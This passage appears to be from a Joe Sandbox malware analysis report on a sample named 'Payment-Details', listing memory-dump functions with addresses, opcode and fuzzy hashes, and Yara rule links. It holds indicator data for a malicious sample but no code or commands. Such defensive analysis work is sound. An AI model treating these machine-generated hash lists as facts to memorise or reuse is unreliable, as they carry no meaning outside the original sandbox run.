                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 164e27bba613c1e1ba48f658d06e3ae85064fe5c72c2ef33220b7b7b086654f6
                                        • Instruction ID: 978f3603b10036c0f68a0d0d0cdd71de9c89cf23b7d2d5e1b9c6d2f075b93d53
                                        • Opcode Fuzzy Hash: 164e27bba613c1e1ba48f658d06e3ae85064fe5c72c2ef33220b7b7b086654f6
                                        • Instruction Fuzzy Hash: 7E3115B0E2424ACFDB04CFA9D8447EEBBF1BB8A710F44806AD814B3254D7744A84CF91
                                        Function 07256890 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75f04a9d3f7d4db72ecbc4a116677c9c6e373792e40f81246e47875b23312f98
                                        • Instruction ID: 1dbc124468b90152463af90a9d422529a0fe40535891816dd4ffdeb939ce2436
                                        • Opcode Fuzzy Hash: 75f04a9d3f7d4db72ecbc4a116677c9c6e373792e40f81246e47875b23312f98
                                        • Instruction Fuzzy Hash: 7D31F2B4A14209DFDB00CFA8D948BEDBBB2FB49710F5080A5E904A7361D375AA84CF91
                                        Function 07256481 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc5e313543f4a623e15552b810020b425ad342b319e5bb98d369410b861b8989
                                        • Instruction ID: 0bc811201a8a283f2d57de1c9040fac5676bea12d93772dbe861a6c7db95cc87
                                        • Opcode Fuzzy Hash: dc5e313543f4a623e15552b810020b425ad342b319e5bb98d369410b861b8989
                                        • Instruction Fuzzy Hash: B5311874E01209DFDB09DFA9D8546EEBBB2FF89310F10806AE916A7360DB305944CBA1
                                        Function 07256930 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d43ee34083db7bf82f6950a0e058402fe6b2c03d0cbac2670904be7a86caf86
                                        • Instruction ID: 34f7aebe5985b488f1dd871d91eeb4fb8b6dffdb6df7a2316f1183c3a70c5cdc
                                        • Opcode Fuzzy Hash: 9d43ee34083db7bf82f6950a0e058402fe6b2c03d0cbac2670904be7a86caf86
                                        • Instruction Fuzzy Hash: 7D3124B0D2020ACBDB04CFA9D8447EEBBF2FB89710F448169D814B3254D7744A45CF91
                                        Function 0723D0D9 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeea89e22a486fe0acdb060c2db7a7ddcf0e9d82794c77eb4c546bd5f83d29ae
                                        • Instruction ID: add33ff7173c20c717ff187eb523d18e108b9ae2d15ee055b19e79a336b4059f
                                        • Opcode Fuzzy Hash: eeea89e22a486fe0acdb060c2db7a7ddcf0e9d82794c77eb4c546bd5f83d29ae
                                        • Instruction Fuzzy Hash: 2C314AB5E242099FDB44CFA9D845AEEBBF5FB4A300F00902AD945B7340D7745945CFA1
                                        Function 07256D98 Relevance: .1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3da7b84c89bc767c4289fd636129347d216b8cd60124056001a430e7180264a4
                                        • Instruction ID: d1f40177343a2af34b0ac404397c59cd22203761d50c7cad465efb74d4ddb2df
                                        • Opcode Fuzzy Hash: 3da7b84c89bc767c4289fd636129347d216b8cd60124056001a430e7180264a4
                                        • Instruction Fuzzy Hash: 263126B0922119CFDB24CF68D889BADBBF6FB4A700F909495D809A3251DB759C85CF21
                                        Function 019F1878 Relevance: .1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6905d942dc6387e8fa8b0ee36ff4aa66c7705076cfb885266b309f8ece7add70
                                        • Instruction ID: 0bbc8e9ce798e3ea6b3fb83bed415f14b5302b10ca422b95a54bc080c306b752
                                        • Opcode Fuzzy Hash: 6905d942dc6387e8fa8b0ee36ff4aa66c7705076cfb885266b309f8ece7add70
                                        • Instruction Fuzzy Hash: 98313570D00249EFDB14CFAAD484ADEBFF5AF48710F24842AE948AB350DB359945DFA0
                                        Function 019F1870 Relevance: .1, Instructions: 82COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93817e905f62b10911c1821a12b5421bc39b90aa54fa61b7b38176ed3bc677fc
                                        • Instruction ID: 0d19541f8e2a861036f7bfb8078f3429566f8caab75adbc9a2e592c91225942f
                                        • Opcode Fuzzy Hash: 93817e905f62b10911c1821a12b5421bc39b90aa54fa61b7b38176ed3bc677fc
                                        • Instruction Fuzzy Hash: AC315970D00249EFDB14DFAAD580ADEBFF5AF48310F24842AE548AB350CB359945DF90
                                        Function 019F5568 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5d2b5cbcae43e834b6a8e0f426aa856510ca72becda1022359fa07f3b373ee
                                        • Instruction ID: 1cb138410f75f43b6124bbb1821f4ed1e2742787125a7c6f34c4b06ac28f80ad
                                        • Opcode Fuzzy Hash: 4c5d2b5cbcae43e834b6a8e0f426aa856510ca72becda1022359fa07f3b373ee
                                        • Instruction Fuzzy Hash: DA21AD71A083059FC710DF79D84859BFBEAFF84214B1584AED60ADB351EB71A8098BA1
                                        Function 0723D202 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7443272e54baa659f89584caf8b966998decce27d941144b95719e6d18a2cbd
                                        • Instruction ID: c9651160420f5e76fb321e07838891004f0b7755912f9a510bbaf65e5107b8a4
                                        • Opcode Fuzzy Hash: d7443272e54baa659f89584caf8b966998decce27d941144b95719e6d18a2cbd
                                        • Instruction Fuzzy Hash: 02315CF5E14209DFCB80DFA4D845BEEBBF9FB4A300F105066E545A3251D7749A80CBA1
                                        Function 0723D0E8 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cbcd4fe3cae3bc10178a82b096ac69ddf9f7ff50cdc89880d6cc12c60855b7b
                                        • Instruction ID: 37fcf95c21466c05c7f8a2bc53f7fc135b6ee465de6d0a57044a3b0608b9900c
                                        • Opcode Fuzzy Hash: 7cbcd4fe3cae3bc10178a82b096ac69ddf9f7ff50cdc89880d6cc12c60855b7b
                                        • Instruction Fuzzy Hash: BE3127B4E24209CBDB44CFA9D844BEEBBF9FB49300F00902AD945B7240C7745985CFA1
                                        Function 07256AA0 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b5efa6cf3e4de98e6061de059464e41d41fa159205126dcb4288ddea7d10479
                                        • Instruction ID: 833543b1b41c8505bf5a365a660b1edd973f4bdb691fc23ac2299f09a61169c2
                                        • Opcode Fuzzy Hash: 0b5efa6cf3e4de98e6061de059464e41d41fa159205126dcb4288ddea7d10479
                                        • Instruction Fuzzy Hash: E731F1B0D10219CFDB64DFA9D8987ADBBB6FB89310F5090AAD909A3350EB745D84CF10
                                        Function 0725E18F Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 435a883b3b4920293347be8eec4ca60e65160c3bb6f0a67d59eea0ee0872c4cb
                                        • Instruction ID: 6d5eb2ff07081cab52829601c48aa9f9527c7c265360a44dca7ceb3773919f08
                                        • Opcode Fuzzy Hash: 435a883b3b4920293347be8eec4ca60e65160c3bb6f0a67d59eea0ee0872c4cb
                                        • Instruction Fuzzy Hash: 3F21A1B130428A9FDB06CF29C850AAA7FE5AF8A310F094096FC94CB3A1D735DD51DB20
                                        Function 07234612 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e15e2989a65de921ddf5959ea6ecc75a66c0f8c1fa96b9e814150782520a4e43
                                        • Instruction ID: 2e595b1a109da604a03f961feae9d38c8693c0a0e4b66d23a4a763d11554d577
                                        • Opcode Fuzzy Hash: e15e2989a65de921ddf5959ea6ecc75a66c0f8c1fa96b9e814150782520a4e43
                                        • Instruction Fuzzy Hash: 3421B7B4A0064ACFCB01EF64C4509EEBBF5FF8A700F10466AD54197360DB74AA06CBA2
                                        Function 07256EBA Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af0a4b4ffa356cc95a117f5c1180fec55b1c8aae7762db9c2514a9c6d26e53e6
                                        • Instruction ID: a9fba1ccea32a1cb29cbe2e03a36edada02d7a1a5d8ec952910f0857df459093
                                        • Opcode Fuzzy Hash: af0a4b4ffa356cc95a117f5c1180fec55b1c8aae7762db9c2514a9c6d26e53e6
                                        • Instruction Fuzzy Hash: 1541F5B4D01219CFDB64DFA8D889BADBBB2FB49310F5080AAD909A3350DB345D84CF10
                                        Function 07259B99 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 173896c12655b009435d2407570e951c7fa0fd5098a64af3aa5833d43e135784
                                        • Instruction ID: ba0da1266a713afd4c5c0fd048b72f97c0c2191dc32a3e57d38d6e56c285c173
                                        • Opcode Fuzzy Hash: 173896c12655b009435d2407570e951c7fa0fd5098a64af3aa5833d43e135784
                                        • Instruction Fuzzy Hash: 8021B3B6700111EFE705DB68D814B25BBA6FFCD210B1484A9E9498B371DB72EC42CB90
                                        Function 07234620 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5df98a8a9fbc6030ad6147a6373581454cd7a43609f32c0f2d5ca39cbb8ad44e
                                        • Instruction ID: 4e91ef83ab75fffef8544cafbe57690d9b4a3ce16e356d581e8744e0ccf5ea99
                                        • Opcode Fuzzy Hash: 5df98a8a9fbc6030ad6147a6373581454cd7a43609f32c0f2d5ca39cbb8ad44e
                                        • Instruction Fuzzy Hash: 162165B5B1060ACFCB00FF68D5445AEB7F5FF89700F50426AD506A7364EB74AA06CB92
                                        Function 072571E8 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9456f59df2155167daf9f464737af0f733338cf80c38481ab144116d34f9af9
                                        • Instruction ID: 2dd79858a3b3a85690118edf9755334d863c91851f6b3310673cc71773b45d05
                                        • Opcode Fuzzy Hash: e9456f59df2155167daf9f464737af0f733338cf80c38481ab144116d34f9af9
                                        • Instruction Fuzzy Hash: 5F41E7B4E00219CFDB64DFA8D8897ADBBB2FB49310F5080A9D90AA3354DB349D84CF11
                                        Function 07257007 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c52620f6a68e769ab71ceeb45715a2d6fceb9cc750ea3a3ba00bbccbe5845750
                                        • Instruction ID: 4c0d283725e7a2c911b233dc3598df9e9318a2daf4273a5fa9a17e6c0616a9ee
                                        • Opcode Fuzzy Hash: c52620f6a68e769ab71ceeb45715a2d6fceb9cc750ea3a3ba00bbccbe5845750
                                        • Instruction Fuzzy Hash: 8041F4B4E01219CFDB64DFA8D9897ADBBB2FB49310F5080A9D94AA7344DB345D84CF11
                                        Function 070E3FF8 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6915e7f161ef53ccf8e01281206b062b5769dea7601c3f16b2c4ed1bddee6409
                                        • Instruction ID: 0128795498e08dec7c59c352648e76d67877f7cc371fe64d19aa45bd935115c9
                                        • Opcode Fuzzy Hash: 6915e7f161ef53ccf8e01281206b062b5769dea7601c3f16b2c4ed1bddee6409
                                        • Instruction Fuzzy Hash: CB212BB4D05249CFDB14DFAAD4042EEBBF6EF89310F149136E525B3250D7784A49CBA1
                                        Function 019FF588 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1d9b7d02229f4fba31480d90a78546daf9fc4163601248288ba92d9e8ea3961
                                        • Instruction ID: 453ba519e8758f8cd7e2118b6d7385ae1edb65dd71b6afcdc15c8a105707e215
                                        • Opcode Fuzzy Hash: b1d9b7d02229f4fba31480d90a78546daf9fc4163601248288ba92d9e8ea3961
                                        • Instruction Fuzzy Hash: 932117B5E0420ADFDB04DFA9D8487EEBAF6FF89311F10882AD619B3254DB7449418B60
                                        Function 0725D620 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a5c9c03e054f493da4d6494bf35ec636370f69531b20e8786447c46843894b32
                                        • Instruction ID: 617094cfa900225e69017f7ffe92d4e46636fbae9a824cfc55c1432190502a99
                                        • Opcode Fuzzy Hash: a5c9c03e054f493da4d6494bf35ec636370f69531b20e8786447c46843894b32
                                        • Instruction Fuzzy Hash: 83217AB1B2061ADFDB00DF78E484BAEBBF4AB04240F10816AD919D7290E774CA42CB91
                                        Function 07259D62 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad9e494b19560b8755fd548cb2b3807bd7f441c216c506cfc2cfd55c801b886d
                                        • Instruction ID: 11c1fabde444a4c9cb07871506da92628c85fc2adc4afce76261db19fddd2953
                                        • Opcode Fuzzy Hash: ad9e494b19560b8755fd548cb2b3807bd7f441c216c506cfc2cfd55c801b886d
                                        • Instruction Fuzzy Hash: 96216075A00249DFDB058FA8C4449DDBBB6EF8D320F149229E815A7390DB759881CBA0
                                        Function 07230A61 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4b8e2dab31af70a55e241311f29f2e96b10f9b309942286197c85df5f0845ed
                                        • Instruction ID: 8427ef04ce66adaafb6eed51369c1f2d9bc491097979e4b6b80e3b73a5c76e13
                                        • Opcode Fuzzy Hash: c4b8e2dab31af70a55e241311f29f2e96b10f9b309942286197c85df5f0845ed
                                        • Instruction Fuzzy Hash: DA214C76A10105AFCB05CF99D988E59BBB6FF48320F0640A5F6099B372D731EC11DB50
                                        Function 07070D7C Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2de1d084d136c674ecdacec6e0542108f56623fa7c6f74e4c68d15362db9e1a
                                        • Instruction ID: 626ebc8e0f27867050655833aa8c1fa5307e01578aface8bb5f0c7c1715ac8e2
                                        • Opcode Fuzzy Hash: f2de1d084d136c674ecdacec6e0542108f56623fa7c6f74e4c68d15362db9e1a
                                        • Instruction Fuzzy Hash: 97318CB0D0434ACFDB19CFA9C8546EEBBB1EF85300F10826AD422A7291D7385985CF95
                                        Function 070EEBE8 Relevance: .1, Instructions: 73COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb5a0751e8c08b00923ce48ef4115f8e980289ed663461cb1104287d4c9fe727
                                        • Instruction ID: d556f2e0a12dca8b49836427d1a0e9841a133a4a4b94080cdad355040d06cc79
                                        • Opcode Fuzzy Hash: fb5a0751e8c08b00923ce48ef4115f8e980289ed663461cb1104287d4c9fe727
                                        • Instruction Fuzzy Hash: 1C21BE70904A1ADFDB05DF5CC8809AAFBB9FF44300F52C2AAD40A97245D331B89ACB95
                                        Function 066F1DF8 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae60767c41ebb0dc69e6f6bd33ac847f48cddc50cdcde2466fc6de48f47b2ce1
                                        • Instruction ID: ece238bcca95c356e2b198e21032175d64e337bbe728e906898cfb459406909f
                                        • Opcode Fuzzy Hash: ae60767c41ebb0dc69e6f6bd33ac847f48cddc50cdcde2466fc6de48f47b2ce1
                                        • Instruction Fuzzy Hash: 353114B1915228DFEB60CF14CC55BD9BBF9BB4A304F0081EAD60CA7291C7755A99CF40
                                        Function 07256B03 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9615fc0947703365478bc1c1712742a2d040a775cb8d512360f17f4464493f00
                                        • Instruction ID: 6202888362317392a2130d7ac5a5551ff14128207ea383467298308535019354
                                        • Opcode Fuzzy Hash: 9615fc0947703365478bc1c1712742a2d040a775cb8d512360f17f4464493f00
                                        • Instruction Fuzzy Hash: 4231D4B490021ACFDB64DFA8D8897ADBBB2FB49310F5090A9D909A3354DB349D84CF10
                                        Function 070EDB00 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22f795574dcd24b86db06d154424188b938291fa074050191a1397d8a401a6ef
                                        • Instruction ID: 1f24f92c93faeae8330afac33da1d997851d2c4e4492935fcec0ffe6a6e402c5
                                        • Opcode Fuzzy Hash: 22f795574dcd24b86db06d154424188b938291fa074050191a1397d8a401a6ef
                                        • Instruction Fuzzy Hash: C0211771A00209DFDB04DF94C581ADDB7F6FF88301F1046A5D445BB2A1DB75AD40CBA0
                                        Function 070E4008 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 724954fc6faafe28787124701c3909a652ecff2f17d1e19a70c54480db540810
                                        • Instruction ID: 2e70d8d7afa9f7d779b3154c19cb2f14a4f167617f0372bb46f32baedbdcde25
                                        • Opcode Fuzzy Hash: 724954fc6faafe28787124701c3909a652ecff2f17d1e19a70c54480db540810
                                        • Instruction Fuzzy Hash: A92139B0D04259CFDB14DFAAD4082EEBBFAEB89310F109136E625F3250D7795A45CBA1
                                        Function 019F53F4 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a12510ef89c6fefe4da2f48b7caa51e767a9a154ea4eb81c5709882a357a17b6
                                        • Instruction ID: 801610aa29ffeb0bcc8b1df1b2dc24fd6b8964a86d31fa5b260f693da44c71d5
                                        • Opcode Fuzzy Hash: a12510ef89c6fefe4da2f48b7caa51e767a9a154ea4eb81c5709882a357a17b6
                                        • Instruction Fuzzy Hash: 1E31D2B4D01358AFEB20DF9AC588B8EBFF5AB48B15F24841EE508A7250C7755845CFA0
                                        Function 0725708F Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63be21eef8e301dbc15cfcf7eb47769c32e6fffced778c894ea22be406ae47b8
                                        • Instruction ID: 7f0877082f0161aae6af894bca42a01219b1dbd4448bee8fe53ac4e5448ee8ad
                                        • Opcode Fuzzy Hash: 63be21eef8e301dbc15cfcf7eb47769c32e6fffced778c894ea22be406ae47b8
                                        • Instruction Fuzzy Hash: B431F4B4D0121ACFDB64DF68D885BADBBB2FB49310F5090AAD94AA3350DB349D84CF11
                                        Function 070EC5D0 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a5f2a192f25bfc4fd5df6c265ace7384e1f19826a2107ffbb5044a24316a6daf
                                        • Instruction ID: bb9158595c21cb0b279ff1ac78e5b460dc055f470a1cbfefe21f8e137deb1e51
                                        • Opcode Fuzzy Hash: a5f2a192f25bfc4fd5df6c265ace7384e1f19826a2107ffbb5044a24316a6daf
                                        • Instruction Fuzzy Hash: 8911F1B2A04218DFDB05DF95D8809DEBBBCFF49210F1581A6E505D7251E730A905CBA0
                                        Function 070EC110 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3aa33588ecc611e462f42b6c37e28c0ca2cb8de35cb9afa752639b5951c3d151
                                        • Instruction ID: 1eeb71d192921a4809ea194cc282fa3283fb86b5698ccd164285a1cfc86da267
